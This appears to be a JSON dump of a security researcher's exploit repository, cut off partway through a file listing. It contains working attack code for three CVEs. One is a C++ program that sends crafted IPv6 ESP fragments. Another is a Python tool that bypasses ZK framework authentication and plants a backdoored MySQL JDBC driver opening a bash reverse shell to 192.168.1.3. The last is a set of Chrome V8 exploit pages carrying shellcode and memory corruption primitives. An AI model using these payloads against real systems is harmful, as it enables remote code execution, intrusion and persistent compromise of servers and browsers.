[
  {
    "path": "CVE-2022-34718/poc.cpp",
    "content": "﻿////////////////////////////////////////////////\r\n// ScannerDemo.cpp文件\r\n\r\n#include \"../common/initsock.h\"\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n\r\n#include \"ntddndis.h\"\r\n\r\n#include \"protoutils.h\"\r\n#include \"ProtoPacket.h\"\r\n#include <Stdint.h>\r\n#include \"Iphlpapi.h\"\r\n#pragma comment(lib, \"Iphlpapi.lib\")\r\n#pragma comment(lib, \"Bcrypt.lib\")\r\n\r\n#include \"../common/comm.h\"\r\n\r\n\r\nDWORD WINAPI SendThread(LPVOID lpParam);\r\nBOOL GetGlobalData();\r\n\r\nu_char\tg_ucLocalMac[6];\t\r\nDWORD\tg_dwGatewayIP;\t\t\r\nDWORD\tg_dwLocalIP;\t\t\r\nDWORD\tg_dwMask;\t\t\t\r\n\r\nCInitSock theSock;\r\nBCRYPT_ALG_HANDLE       m_hAesAlg;\r\nBCRYPT_KEY_HANDLE       m_hKey;\r\nPBYTE                   m_pbKeyObject;\r\nPBYTE                   m_pbIV;\r\n\r\n//Handle for Hash\r\nBCRYPT_HASH_HANDLE\t\tm_hHash;\r\nPBYTE\t\t\t\t\tm_pbHashObject;\r\nBCRYPT_ALG_HANDLE\t\tm_hHashAlg;\r\nBYTE rgbHash[0x14];\r\n\r\nUCHAR str_SHA1_key[] =\r\n\"\\xbc\\x3d\\x6e\\x74\\x2d\\xd2\\x13\\xbe\\x0b\\xa9\\x42\\xb7\\x33\\xa4\\x7a\\xf4\\x9b\\xa2\\xa8\\x90\";\r\nUINT32 spi = htonl(0x861b157c);\r\nvoid SHA1(PUCHAR str_data, DWORD len)\r\n{\r\n\t\r\n\tBCRYPT_KEY_HANDLE\thKey = NULL;\r\n\tDWORD cbHashObject, cbResult, temp = 0;\r\n\t\r\n\tDWORD cbData = 0;\r\n\tBCryptOpenAlgorithmProvider(&m_hHashAlg, BCRYPT_SHA1_ALGORITHM, NULL, 8);\r\n\t//  Determine the size of the Hash object\r\n\tBCryptGetProperty(m_hHashAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbHashObject, sizeof(DWORD), &cbResult, 0);\r\n\tm_pbHashObject = (PBYTE)malloc(cbHashObject);\r\n\t//  Create the Hash object\r\n\tBCryptCreateHash(m_hHashAlg, &m_hHash, m_pbHashObject, cbHashObject, str_SHA1_key, 0x14, 0);\r\n\t// Hash the data\r\n\tBCryptHashData(m_hHash, (PBYTE)str_data, len, 0);\r\n\t// Finish the hash\r\n\tBCryptFinishHash(m_hHash, rgbHash, 0x14, 0);\r\n\treturn ;\r\n\r\n}\r\nBOOL GetGlobalData()\r\n{\r\n\tPIP_ADAPTER_INFO pAdapterInfo = NULL;\r\n\tULONG ulLen = 
0;\r\n\r\n\t::GetAdaptersInfo(pAdapterInfo, &ulLen);\r\n\tpAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen);\r\n\r\n\tif (::GetAdaptersInfo(pAdapterInfo, &ulLen) == ERROR_SUCCESS)\r\n\t{\r\n\t\tif (pAdapterInfo != NULL)\r\n\t\t{\r\n\t\t\tmemcpy(g_ucLocalMac, pAdapterInfo->Address, 6);\r\n\t\t\tg_dwGatewayIP = ::inet_addr(pAdapterInfo->GatewayList.IpAddress.String);\r\n\t\t\tg_dwLocalIP = ::inet_addr(pAdapterInfo->IpAddressList.IpAddress.String);\r\n\t\t\tg_dwMask = ::inet_addr(pAdapterInfo->IpAddressList.IpMask.String);\r\n\t\t}\r\n\t}\r\n\t::GlobalFree(pAdapterInfo);\r\n\treturn TRUE;\r\n}\r\nint main()\r\n{\r\n\tGetGlobalData();\r\n\tif (!ProtoStartService())\r\n\t{\r\n\t\tprintf(\" ProtoStartService() failed %d \\n\", ::GetLastError());\r\n\t\treturn -1;\r\n\t}\r\n\tHANDLE hControlDevice = ProtoOpenControlDevice();\r\n\tif (hControlDevice == INVALID_HANDLE_VALUE)\r\n\t{\r\n\t\tprintf(\" ProtoOpenControlDevice() failed() %d \\n\", ::GetLastError());\r\n\t\tProtoStopService();\r\n\t\treturn -1;\r\n\t}\r\n\tCPROTOAdapters adapters;\r\n\tif (!adapters.EnumAdapters(hControlDevice))\r\n\t{\r\n\t\tprintf(\" Enume adapter failed \\n\");\r\n\t\tProtoStopService();\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tCAdapter adapter;\r\n\tif (!adapter.OpenAdapter(adapters.m_pwszSymbolicLink[0], FALSE))\r\n\t{\r\n\t\tprintf(\" OpenAdapter failed \\n\");\r\n\t\tProtoStopService();\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tadapter.SetFilter(\t//  NDIS_PACKET_TYPE_PROMISCUOUS|\r\n\t\tNDIS_PACKET_TYPE_DIRECTED |\r\n\t\tNDIS_PACKET_TYPE_MULTICAST | NDIS_PACKET_TYPE_BROADCAST);\r\n\r\n\r\n\tUCHAR ipv6_ESP_Fragment_1[] 
=\r\n\t\t\t\"\\x00\\x0c\\x29\\x1c\\x11\\x93\\x00\\x0c\\x29\\x5c\\x9a\\x88\\x86\\xdd\\x60\\x00\"\r\n\t\t\t\"\\x00\\x00\\x00\\x38\\x32\\x40\\xfe\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x81\\x85\"\r\n\t\t\t\"\\xb1\\x51\\x19\\x43\\x54\\x19\\xfe\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\xe5\"\r\n\t\t\t\"\\x70\\x83\\x16\\x6f\\xef\\x6b\"\r\n\t\t\t\r\n\t\t\t\"\\x41\\x41\\x41\\x41\\x00\\x00\\x00\\x21\"//SPI+Seq\r\n\t\t\t\"\\x2c\\x00\\x00\\x01\\x52\\x52\\x52\\x52\\x32\\x00\\x00\\x01\\x96\\x74\\xd9\\x9d\"\r\n\t\t\t\"\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\t\t\"\\x01\\x02\\x02\\x2c\"//ESP tail\r\n\t\t\t\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\";//HMAC;\r\n\tUCHAR ipv6_ESP_Fragment_2[] =\r\n\t\t\t\"\\x00\\x0c\\x29\\x1c\\x11\\x93\\x00\\x0c\\x29\\x5c\\x9a\\x88\\x86\\xdd\\x60\\x00\"\r\n\t\t\t\"\\x00\\x00\\x00\\x38\\x32\\x40\\xfe\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x81\\x85\"\r\n\t\t\t\"\\xb1\\x51\\x19\\x43\\x54\\x19\\xfe\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\xe5\"\r\n\t\t\t\"\\x70\\x83\\x16\\x6f\\xef\\x6b\"\r\n\t\t\t\r\n\t\t\t\"\\x41\\x41\\x41\\x41\\x00\\x00\\x00\\x22\"//SPI+Seq\r\n\t\t\t\"\\x2c\\x00\\x00\\x18\\x52\\x52\\x52\\x52\\x32\\x00\\x00\\x00\\x96\\x74\\xd9\\x9d\"\r\n\t\t\t\"\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\t\t\"\\x01\\x02\\x02\\x2c\"//ESP tail\r\n\t\t\t\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\";//HMAC;\r\n\r\n\t\t\t\r\n\tmemcpy(ipv6_ESP_Fragment_1 + 0x36, &spi, 4);\r\n\tSHA1(&ipv6_ESP_Fragment_1[0x36], 0x2c);\r\n\tmemcpy(ipv6_ESP_Fragment_1 + 0x62, rgbHash, 0x0c);\r\n\r\n\tmemcpy(ipv6_ESP_Fragment_2 + 0x36, &spi, 4);\r\n\tSHA1(&ipv6_ESP_Fragment_2[0x36], 0x2c);\r\n\tmemcpy(ipv6_ESP_Fragment_2 + 0x62, rgbHash, 0x0c);\r\n\r\n\tadapter.SendData(ipv6_ESP_Fragment_1, sizeof(ipv6_ESP_Fragment_1)-1);\r\n\t\r\n\tadapter.SendData(ipv6_ESP_Fragment_2, sizeof(ipv6_ESP_Fragment_2)-1);\r\n\r\n\tProtoStopService();\r\n\r\n\treturn 
0;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n"
  },
  {
    "path": "CVE-2022-36537/Driver.java",
    "content": "package com.mysql.jdbc;\n\nimport java.sql.*;\nimport java.util.*;\nimport java.util.logging.Logger;\n\n/*\n    author: Bearcat of www.numencyber.com\n    desc  : Mysql jdbc backdoor driver\n*/\npublic class Driver implements java.sql.Driver {\n    static {\n        String winCmd = \"calc\";\n        String linuxCmd = \"bash -i >& /dev/tcp/192.168.1.3/2022 0>&1\";\n\n        String[] cmds = null;\n\n        if (System.getProperty(\"os.name\").toLowerCase().contains(\"win\")) {\n            cmds = new String[]{\"cmd.exe\", \"/c\", winCmd};\n        } else {\n            cmds = new String[]{\"/bin/bash\", \"-c\", linuxCmd};\n        }\n\n        try {\n            Runtime.getRuntime().exec(cmds);\n        } catch (Exception ignored) {\n            // do nothing...\n        }\n    }\n\n @Override\n    public Connection connect(String url, Properties info) throws SQLException {\n        return null;\n    }\n\n    @Override\n    public boolean acceptsURL(String url) throws SQLException {\n        return false;\n    }\n\n    @Override\n    public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {\n        return new DriverPropertyInfo[0];\n    }\n\n    @Override\n    public int getMajorVersion() {\n        return 0;\n    }\n\n    @Override\n    public int getMinorVersion() {\n        return 0;\n    }\n\n    @Override\n    public boolean jdbcCompliant() {\n        return false;\n    }\n\n    @Override\n    public Logger getParentLogger() throws SQLFeatureNotSupportedException {\n        return null;\n    }\n}"
  },
  {
    "path": "CVE-2022-36537/cve-2022-36537.py",
    "content": "#!/usr/bin/env python3\n# coding: utf-8\n\"\"\"\n@File    : cve-2022-36537.py\n@Time    : 2022/11/11 23:34\n@Author  : Bearcat of www.numencyber.com\n@Version : 1.0\n@Desc    : ZK framework authentication bypass & connectWise r1Soft server backup manager remote code execution.\n\"\"\"\n\nimport sys\nimport subprocess\nimport os\nimport warnings\nimport re\n\nimport zipfile\nimport shutil\n\nimport requests\nfrom requests_toolbelt import MultipartEncoder\nimport urllib3\n\nfrom selenium import webdriver\nfrom rich import print as rprint\n\nimport argparse\n\nurllib3.disable_warnings()\n\n# proxy = {\n#    \"http\": \"http://127.0.0.1:8080\"\n# }\n\nproxy = {}\n\n\n# https://chromedriver.storage.googleapis.com/index.html?path=107.0.5304.62/\ndef bypass_auth1(target):\n    warnings.warn(\"Discard. The bypass auch2 function is simpler to obtain dtid and cookies.\", DeprecationWarning)\n    rprint(\"[italic green][*] Bypass authentication.\")\n    try:\n        opt = webdriver.ChromeOptions()\n        opt.add_argument('--headless')\n        opt.add_argument('--ignore-certificate-errors')\n        driver = webdriver.Chrome(executable_path='./chromedriver', options=opt)\n        driver.get(target)\n        cookie_str = \"JSESSIONID=\" + driver.get_cookie(\"JSESSIONID\")['value']\n        dtid = driver.execute_script(\"\"\"\n            for (var dtid in zk.Desktop.all)\n            return dtid\n        \"\"\")\n        return dtid, cookie_str\n    except Exception as e:\n        rprint(\"[italic red][-] Bypass authentication failed. 
{0}\".format(e))\n        exit()\n\n\ndef bypass_auth2(target):\n    rprint(\"[italic green][*] Bypass authentication.\")\n    uri = \"{0}/login.zul\".format(target)\n    try:\n        result = requests.get(url=uri, timeout=3, verify=False, proxies=proxy)\n        cookie_str = result.headers['Set-Cookie'].split(\";\")[0]\n        r = u\"dt:'(.*?)',cu:\"\n        regex = re.compile(r)\n        dtid = regex.findall(result.text)[0]\n        return dtid, cookie_str\n    except Exception as e:\n        rprint(\"[italic red][-] Bypass authentication failed. {0}\".format(e))\n        exit()\n\n\ndef forward_request(target, next_uri, cookie_str, uuid, dtid):\n    uri = \"{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1\".format(target, uuid, dtid)\n    param = {\"nextURI\": (None, next_uri)}\n    headers = {\"Cookie\": cookie_str}\n    data = MultipartEncoder(param, boundary=\"----WebKitFormBoundaryCs6yB0zvpfSBbYEp\")\n    headers[\"Content-Type\"] = data.content_type\n    try:\n        result = requests.post(url=uri, headers=headers, data=data.to_string(), timeout=3, verify=False, proxies=proxy)\n        return result\n    except Exception as e:\n        rprint(\"[italic red][-] Forward request failed. {0}\".format(e))\n        exit()\n\n\ndef read_file(target, filename):\n    # get login_dtid\n    login_dtid, cookie_str = bypass_auth2(target)\n    rprint(\"[italic green][*] Start reading the file:\")\n    result = forward_request(target, filename, cookie_str, \"101010\", login_dtid)\n    return \"-----file start-----\\n{0}\\n-----file end-----\".format(result.text)\n\n\ndef deploy_jdbc_backdoor(target):\n    rprint(\n        \"[italic red][!] The jdbc backdoor can only be deployed once, please make it persistent, such as rebounding the shell.\")\n    play_again = input(\"Whether to continue? 
(y/n):\").lower()\n    if play_again[0] != \"y\":\n        exit()\n    # get login_dtid\n    login_dtid, cookie_str = bypass_auth2(target)\n    rprint(\"[italic green][*] Start deploying the jdbc backdoor.\")\n    build_jdbc_backdoor()\n    # database_dtid and mysql_driver_upload_button_id\n    uri = \"/Configuration/database-drivers.zul\"\n    result = forward_request(target, uri, cookie_str, \"101010\", login_dtid)\n    r1 = u\"{dt:'(.*?)',cu:\"\n    regex = re.compile(r1)\n    database_dtid = regex.findall(result.text)[0]\n    r1 = u\"'zul.wgt.Button','(.*?)',\"\n    regex = re.compile(r1)\n    mysql_driver_upload_button_id = regex.findall(result.text)[0]\n\n    uri = \"/zkau?dtid={0}&cmd_0=onClick&uuid_0={1}&data_0=%7B%22pageX%22%3A315%2C%22pageY%22%3A120%2C%22which%22%3A1%2C%22x%22%3A39%2C%22y%22%3A23%7D\".format(\n        database_dtid, mysql_driver_upload_button_id)\n    result = forward_request(target, uri, cookie_str, \"101010\", login_dtid)\n\n    # file_upload_dlg_id and file_upload_id\n    r1 = u\"zul.fud.FileuploadDlg','(.*?)',\"\n    regex = re.compile(r1)\n    file_upload_dlg_id = regex.findall(result.text)[0]\n\n    r1 = u\"zul.wgt.Fileupload','(.*?)',\"\n    regex = re.compile(r1)\n    file_upload_id = regex.findall(result.text)[0]\n\n    uri = \"{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1\".format(target, file_upload_id, database_dtid)\n    upload_jdbc_backdoor(uri, cookie_str)\n\n    uri = \"/zkau?dtid={0}&cmd_0=onMove&opt_0=i&uuid_0={1}&data_0=%7B%22left%22%3A%22716px%22%2C%22top%22%3A%22100px%22%7D&cmd_1=onZIndex&opt_1=i&uuid_1={2}&data_1=%7B%22%22%3A1800%7D&cmd_2=updateResult&data_2=%7B%22contentId%22%3A%22z__ul_0%22%2C%22wid%22%3A%22{3}%22%2C%22sid%22%3A%220%22%7D\".format(\n        database_dtid, file_upload_dlg_id, file_upload_dlg_id, file_upload_id)\n    forward_request(target, uri, cookie_str, \"101010\", login_dtid)\n\n    uri = \"/zkau?dtid={0}&cmd_0=onClose&uuid_0={1}&data_0=%7B%22%22%3Atrue%7D\".format(database_dtid,\n          
                                                                            file_upload_dlg_id)\n    forward_request(target, uri, cookie_str, \"101010\", login_dtid)\n\n\ndef upload_jdbc_backdoor(uri, cookie_str):\n    rprint(\"[italic green][*] Upload the database driver.\")\n    headers = {\"Cookie\": cookie_str}\n    files = {'file': ('b.jar', open('jdbc_backdoor.jar', 'rb'), 'application/java-archive')}\n    try:\n        requests.post(uri, files=files, headers=headers, timeout=6, verify=False, proxies=proxy)\n    except Exception as e:\n        rprint(\"[italic red][-] Upload the database driver failed. {0}\".format(e))\n        exit()\n\n\ndef build_jdbc_backdoor():\n    rprint(\"[italic green][*] Compile java code.\")\n    java_cmd = 'javac -source 1.5 -target 1.5 Driver.java'\n    popen = subprocess.Popen(java_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n    popen.stdout.read()\n\n    tmp_path = 'jdbc_jar'\n    os.mkdir(tmp_path)\n    with zipfile.ZipFile('mysql-connector-java-5.1.48.jar', 'r', zipfile.ZIP_DEFLATED) as unzf:\n        unzf.extractall(\"jdbc_jar\")\n        unzf.close()\n    os.remove('jdbc_jar/com/mysql/jdbc/Driver.class')\n    shutil.copy('Driver.class', 'jdbc_jar/com/mysql/jdbc/')\n\n    with zipfile.ZipFile('jdbc_backdoor.jar', 'w', zipfile.ZIP_DEFLATED) as zf:\n        for root, dirs, files in os.walk(tmp_path):\n            relative_root = '' if root == tmp_path else root.replace(tmp_path, '') + os.sep\n            for filename in files:\n                zf.write(os.path.join(root, filename), relative_root + filename)\n        zf.close()\n    shutil.rmtree(tmp_path)\n\n    rprint(\"[italic green][*] Build jdbc backdoor success.\")\n\n\ndef banner():\n    rprint(\"[italic white]CVE-2022-36537:\\n\\tZK framework authentication bypass\")\n    rprint(\"[italic white]\\tConnectWise r1Soft server backup manager remote code execution\")\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser(prog='cve-2022-36537',\n 
                                    formatter_class=argparse.RawTextHelpFormatter,\n                                     description='author: Bearcat of www.numencyber.com',\n                                     usage='cve-2022-36537.py [options]')\n    parser.add_argument('-u', '--url', type=str, default='', help='target url')\n    parser.add_argument('-r', '--read', type=str, default='', help='reading the file')\n    parser.add_argument('-b', '--build', action=\"store_true\", help='build jdbc backdoor')\n    parser.add_argument('-d', '--deploy', action=\"store_true\", help='deploying the jdbc backdoor')\n\n    if len(sys.argv) == 1:\n        sys.argv.append('-h')\n\n    args = parser.parse_args()\n    return args\n\n\nif __name__ == '__main__':\n    banner()\n    args = parse_args()\n    if args.url and args.read:\n        print(read_file(args.url, args.read))\n        exit()\n    if args.build:\n        build_jdbc_backdoor()\n        exit()\n    if args.url and args.deploy:\n        deploy_jdbc_backdoor(args.url)\n        exit()\n"
  },
  {
    "path": "CVE-2022-36537/requirements.txt",
    "content": "requests==2.28.1\nrequests_toolbelt==0.10.1\nrich==12.6.0\nselenium==4.7.2\nurllib3==1.25.3\n"
  },
  {
    "path": "CVE-2022-3723/01.html",
    "content": "<body>\r\n    <div id=\"iframeContainer\"></div>\r\n</body>\r\n<script>\r\n    var arr = [2.2, 2.2];\r\n    window.onload = function () {\r\n        let frame = document.createElement(\"iframe\");\r\n        // 基本设置\r\n        frame.src = \"arr.html\"; // iframe 的来源\r\n        frame.height = \"300px\"; // iframe 的高度\r\n        frame.width = \"300px\"; // iframe 的宽度\r\n        // 将 iframe 插入到 HTML 文档中\r\n        let container = document.getElementById(\"iframeContainer\");\r\n        container.appendChild(frame);\r\n        alert(1);\r\n        % DebugPrint(arr);\r\n        alert(2); \r\n        let frame2 = document.createElement(\"iframe\");\r\n        // 基本设置\r\n        frame2.src = \"exp.html\"; // iframe 的来源\r\n        frame2.height = \"300px\"; // frame2 的高度\r\n        frame2.width = \"300px\"; // frame2 的宽度\r\n        // 将 frame2 插入到 HTML 文档中\r\n        container.appendChild(frame2);\r\n        alert(1);\r\n        % DebugPrint(arr);\r\n        alert(2);         \r\n    };\r\n</script>"
  },
  {
    "path": "CVE-2022-3723/Readme.md",
    "content": "exploit of CVE-2022-3723\n\nbased on google's public poc"
  },
  {
    "path": "CVE-2022-3723/arr.html",
    "content": "<script>\r\n    var dv = new DataView(new ArrayBuffer(0x10));\r\n    function gc() {\r\n        for (var i = 0; i < 0x100; i++) new Array(0x200);\r\n    }\r\n    const to_hex = num => {\r\n        return (num >> 0n).toString(16);\r\n    }\r\n    function biglow(b) {\r\n        dv.setBigUint64(0, b, true);\r\n        return (dv.getUint32(0, true));\r\n    }\r\n    function bighi(b) {\r\n        dv.setBigUint64(0, b, true);\r\n        return (dv.getUint32(4, true));\r\n    }\r\n    function f2big(f) {\r\n        dv.setFloat64(0, f, true);\r\n        return (dv.getBigUint64(0, true));\r\n    }\r\n    function big2f(b) {\r\n        dv.setBigUint64(0, b, true);\r\n        return dv.getFloat64(0, true);\r\n    }\r\n    function flow(f) {\r\n        dv.setFloat64(0, f, true);\r\n        return (dv.getUint32(0, true));\r\n    }\r\n    function fhi(f) {\r\n        dv.setFloat64(0, f, true);\r\n        return (dv.getUint32(4, true));\r\n    }\r\n    function i2f(low, hi) {\r\n        dv.setUint32(0, low, true);\r\n        dv.setUint32(4, hi, true);\r\n        return dv.getFloat64(0, true);\r\n    }\r\n    function majorGc() {\r\n        var arr_stack = [];\r\n        for (let i = 0; i < 80; i++) {\r\n            try {\r\n                arr_stack.push(new ArrayBuffer(0x7ff00000000 + i));\r\n            } catch (msg) {\r\n                break;\r\n            }\r\n        }\r\n    }\r\n    class LeakArrayBuffer extends ArrayBuffer {\r\n        constructor(size) {\r\n            super(size);\r\n            this.rw = [1.7, 1.7];// 0x3ffb333333333333\r\n            this.slot = 0xb33f;//搜索0x1667E，查看改变位置，为leakObj地方\r\n        }\r\n    }\r\n    let shellcode = [2.222372952568011e+127,\r\n        3.4476922241098093e+40,\r\n        -2.5784757691472832e-254,\r\n        -1.476674265851898e-90,\r\n        2.582607795529539e-293,\r\n        2.4887534188622283e+253,\r\n        9.353354960368843e-158,\r\n        1.772861363575525e-297,\r\n        2.941218276584707e+26,\r\n  
      1.7578789445410664e-302,\r\n        -1.3535215646275278e-183,\r\n        1.19831254e-314];\r\n    var arr = null;\r\n    var buff = null;\r\n    for (let i = 0; i < 0x1000; i++) {\r\n        arr = new Array(1.1, 1.1);\r\n        buff = new LeakArrayBuffer(0x1337);\r\n    }\r\n    majorGc(); gc(); majorGc(); gc(); majorGc(); gc(); majorGc(); gc();\r\n    {\r\n        function leak() {\r\n            function setInnerProperty(o, obj) {\r\n                for (let m = 0; m < 0x100000; m++) {\r\n                    o.inner.foo = obj;\r\n                }\r\n            }\r\n            function foo(str, addr) {\r\n                var o = {\r\n                    inner: {\r\n                        ['foo']: 1.5\r\n                    }\r\n                };\r\n                eval(str);// eval防止内联\r\n                // o.inner.foo = addr;\r\n                return o.inner.foo;\r\n                // return arr;\r\n            };\r\n            % PrepareFunctionForOptimization(foo);\r\n            // optimize setInnerProperty\r\n            foo(\"setInnerProperty(o, arr);\", 1.4);\r\n            majorGc();\r\n            foo(\"setInnerProperty(o, arr);\", 1.4);\r\n            majorGc();\r\n            % OptimizeFunctionOnNextCall(foo);\r\n            let o = foo(\"setInnerProperty(o, arr);\", 1.4);\r\n            // console.log(f2big(o).toString(16));\r\n            return (f2big(o).toString(16));\r\n        }\r\n        let addr = leak();\r\n        fetch(addr, {\r\n            method: 'GET',\r\n            mode: 'no-cors' // 在开发环境中允许不安全连接\r\n        })\r\n            .then(response => {\r\n                % DebugPrint(\"fuckhere\");\r\n                % DebugPrint(arr);\r\n            })  // 你也可以使用 response.json() 如果你知道响应会是 JSON 格式的\r\n            .then(data => {\r\n                new Promise((resolve, reject) => {\r\n                    setTimeout(() => {\r\n                        resolve();\r\n                    }, 2000);\r\n                }).then(() => 
{\r\n                    if (arr.length !== 2) {\r\n                        alert(\"length is changed!!check how to exp\");\r\n                        console.log(\"length is changed!!check how to exp\");\r\n                        function leakObj(o) {\r\n                            buff.slot = o;\r\n                            return fhi(arr[10]);\r\n                        }\r\n                        function write(addr_low, val) {\r\n                            arr[15] = i2f((addr_low | 1) - 0x8, fhi(arr[15]));\r\n                            buff.rw[0] = val;\r\n                        }\r\n                        function read(addr_low) {\r\n                            arr[15] = i2f((addr_low | 1) - 0x8, fhi(arr[15]));\r\n                            return buff.rw[0];\r\n                        }\r\n\r\n                        // randPE_addr = read(function_slot);\r\n                        // alert(f2big(randPE_addr).toString(16).padStart(16, 0));\r\n                        arr_addr = leakObj(shellcode);\r\n                        raw_shellcode_addr = ((flow(read(arr_addr + 0x8))) | 1) - 1 + 0x8;\r\n                        % DebugPrint(shellcode);\r\n                        alert(\"raw_shellcode_addr:\" + raw_shellcode_addr.toString(16).padStart(8, 0));\r\n                        fetch(raw_shellcode_addr.toString(16).padStart(8, 0)+\".wasm\")\r\n                            .then((response) => response.arrayBuffer())\r\n                            .then((wasmBinary) => WebAssembly.compile(wasmBinary))\r\n                            .then((wasmModule) => WebAssembly.instantiate(wasmModule))\r\n                            .then((wasmInstance) => {\r\n                                const { f } = wasmInstance.exports;\r\n                                % DebugPrint(\"wasmInstance addr is:\");\r\n                                % DebugPrint(wasmInstance);\r\n                                wasmInstance_addr = leakObj(wasmInstance);\r\n                             
   alert(\"wasmInstance_addr:\"+wasmInstance_addr.toString(16).padStart(8,0));\r\n                                rx_mem_addr = f2big(read(wasmInstance_addr + 0x60));\r\n                                alert(\"rx_mem_addr:\"+rx_mem_addr.toString(16).padStart(16,0));\r\n                                rop_start=rx_mem_addr+0x65dn;\r\n                                // 泄露function地址，修改 backingStore\r\n                                % DebugPrint(\"main func addr is:\");\r\n                                % DebugPrint(f);\r\n                                faddr = leakObj(f);\r\n                                alert(\"f addr:\" + faddr.toString(16).padStart(8, 0));\r\n                                function_slot = flow(read(faddr + 0x18)) + 0x10;\r\n                                alert(\"function_slot and go to mem to check addr:\" + function_slot.toString(16).padStart(8, 0));\r\n                                write(function_slot,big2f(rop_start));\r\n                                alert(\"check memory\");\r\n                                f();\r\n                            });\r\n                    }\r\n                });\r\n            })\r\n            .catch(error => {\r\n                // 在这里处理任何上面的.then()中发生的错误\r\n                console.error('Error:', error);\r\n            });\r\n    }\r\n</script>"
  },
  {
    "path": "CVE-2022-3723/exp.html",
    "content": "<script>\r\n    var arr = [2.2, 2.2];\r\n    function exp() {\r\n        var dv = new DataView(new ArrayBuffer(0x10));\r\n        function gc() {\r\n            for (var i = 0; i < 0x100; i++) new Array(0x200);\r\n        }\r\n        const to_hex = num => {\r\n            return (num >> 0n).toString(16);\r\n        }\r\n        function biglow(b) {\r\n            dv.setBigUint64(0, b);\r\n            return (dv.getUint32(0, true));\r\n        }\r\n        function bighi(b) {\r\n            dv.setBigUint64(0, b);\r\n            return (dv.getUint32(4, true));\r\n        }\r\n        function f2big(f) {\r\n            dv.setFloat64(0, f);\r\n            return (dv.getBigUint64(0, true));\r\n        }\r\n        function big2f(b) {\r\n            dv.setBigUint64(0, b, true);\r\n            return dv.getFloat64(0);\r\n        }\r\n        function flow(f) {\r\n            dv.setFloat64(0, f, true);\r\n            return (dv.getUint32(0, true));\r\n        }\r\n        function fhi(f) {\r\n            dv.setFloat64(0, f, true);\r\n            return (dv.getUint32(4, true));\r\n        }\r\n        function i2f(low, hi) {\r\n            dv.setUint32(0, low, true);\r\n            dv.setUint32(4, hi, true);\r\n            return dv.getFloat64(0, true);\r\n        }\r\n        function majorGc() {\r\n            var arr_stack = [];\r\n            for (let i = 0; i < 80; i++) {\r\n                try {\r\n                    arr_stack.push(new ArrayBuffer(0x7ff00000000 + i));\r\n                } catch (msg) {\r\n                    break;\r\n                }\r\n            }\r\n        }\r\n        function main() {\r\n            var arr = [1.1, 1.1];\r\n            function setInnerProperty(o, obj) {\r\n                for (let m = 0; m < 0x100000; m++) {\r\n                    o.inner.foo = obj;\r\n                }\r\n            }\r\n            // % PrepareFunctionForOptimization(setInnerProperty);\r\n            // % 
OptimizeFunctionOnNextCall(setInnerProperty);\r\n            function setaddr(str, addr, flag) {\r\n                var o = {\r\n                    inner: {\r\n                        ['foo']: 1.5\r\n                    }\r\n                };\r\n                eval(str);// eval防止内联\r\n                if (flag) {\r\n                    console.log(\"fuckme\");\r\n                    console.log(o.inner.foo)\r\n                }\r\n                o.inner.foo = addr;\r\n                // return o.inner.foo;\r\n                return arr;\r\n            };  \r\n            % PrepareFunctionForOptimization(setaddr);\r\n            // optimize setInnerProperty\r\n            setaddr(\"setInnerProperty(o, arr,false);\", xxx);\r\n            majorGc();\r\n            setaddr(\"setInnerProperty(o, arr,false);\", xxx);\r\n            majorGc();\r\n            % OptimizeFunctionOnNextCall(setaddr);\r\n            // % DebugPrint(arr);\r\n            // \r\n            let o = setaddr(\"setInnerProperty(o, arr,true);\", xxx);\r\n            %DebugPrint(\"fuck\");\r\n            % DebugPrint(o);\r\n            alert(\"go to change length\");\r\n            o[0]=i2f(flow(o[0]),0x40);\r\n            alert(\"check Length\");\r\n        }\r\n        main();\r\n    };\r\n    exp();\r\n</script>"
  },
  {
    "path": "CVE-2022-3723/go.mod",
    "content": "module httpsServer\n\ngo 1.20\n\nrequire github.com/bytecodealliance/wasmtime-go/v8 v8.0.0\n"
  },
  {
    "path": "CVE-2022-3723/go.sum",
    "content": "github.com/bytecodealliance/wasmtime-go/v8 v8.0.0 h1:jP4sqm2PHgm3+eQ50zCoCdIyQFkIL/Rtkw6TT8OYPFI=\ngithub.com/bytecodealliance/wasmtime-go/v8 v8.0.0/go.mod h1:tgazNLU7xSC2gfRAM8L4WyE+dgs5yp9FF5/tGebEQyM=\ngithub.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=\ngithub.com/niemeyer/pretty v0.0.0-20200227124842-a10e7caefd8e h1:fD57ERR4JtEqsWbfPhv4DMiApHyliiK5xCTNVSPiaAs=\ngithub.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=\ngithub.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk=\ngopkg.in/check.v1 v1.0.0-20200902074654-038fdea0a05b h1:QRR6H1YWRnHb4Y/HeNFCTJLFVxaq6wH4YuVdsUOr75U=\ngopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=\n"
  },
  {
    "path": "CVE-2022-3723/mainHttps.go",
